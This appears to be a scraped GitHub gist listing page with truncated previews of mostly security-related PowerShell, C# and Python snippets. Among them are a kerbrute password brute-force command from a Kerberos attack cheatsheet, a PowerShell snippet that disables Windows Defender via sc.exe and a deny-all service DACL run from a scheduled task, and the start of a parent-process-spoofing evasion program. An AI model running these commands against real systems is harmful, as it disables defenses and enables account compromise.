PE Injection/Impersonation:
Marshall Hallenbeck Marshall-Hallenbeck
psignoret
/ Get-AzureADPSPermissions.ps1
Last active
May 21, 2024 09:46
Script to list all delegated permissions and application permissions in Microsoft Entra ID
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF | |
| # FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT. | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" } | |
| #Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" } | |
| <# |
mubix
/ Reset-KrbtgtKeyInteractive.ps1
Created
February 17, 2015 03:13
Microsoft KRBTGT Reset script - https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <#---------------------------------------------------------------------------------------------------- | |
| Release Notes: | |
| v1.4: | |
| Author: Jared Poeppelman, Microsoft | |
| First version published on TechNet Script Gallery | |
| ----------------------------------------------------------------------------------------------------#> | |
| function Test-Command | |
| { |
Marshall-Hallenbeck
/ StopEvaluationShutdown.ps1
Last active
May 5, 2024 15:30
Prevent Automatic Shutdown for Expired Windows Evaluation VMs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create PS folder on C: drive | |
| New-Item -ItemType Directory -Force -Path "C:\PS" | |
| # Set TLS versions for download (it will error otherwise) | |
| [Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls" | |
| # Download PsTools | |
| Invoke-WebRequest -Uri "https://download.sysinternals.com/files/PSTools.zip" -OutFile "C:\PS\PSTools.zip" | |
| # Extract PsTools to the PS folder | |
| Expand-Archive -Path "C:\PS\PSTools.zip" -DestinationPath "C:\PS" | |
| # Auto Accept EULA, can also run psexec with -accepteula | |
| #reg ADD HKCU\Software\Sysinternals\PSexec /v EulaAccepted /t REG_DWORD /d 1 /f |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
Julynx
/ 15_python_tips.md
Last active
April 4, 2024 06:20
15 Python Tips To Take Your Code To The Next Level!
Marshall-Hallenbeck
/ gist:6b03af2ff023c6b6227c48bd3d866dba
Created
March 27, 2024 01:25
Print caller name, file, and line number in Pyhton
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| caller_name = inspect.stack()[1].function | |
| file_name = inspect.stack()[1].filename | |
| line_number = inspect.stack()[1].lineno | |
| self.logger.debug(f"Called from function: {caller_name} in file {file_name} at line {line_number}") |
rasta-mouse
/ PPID Spoof & BlockDLLs
Last active
February 29, 2024 04:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
Some golden links when you are having issues: https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Download and install Certi
NewerOlder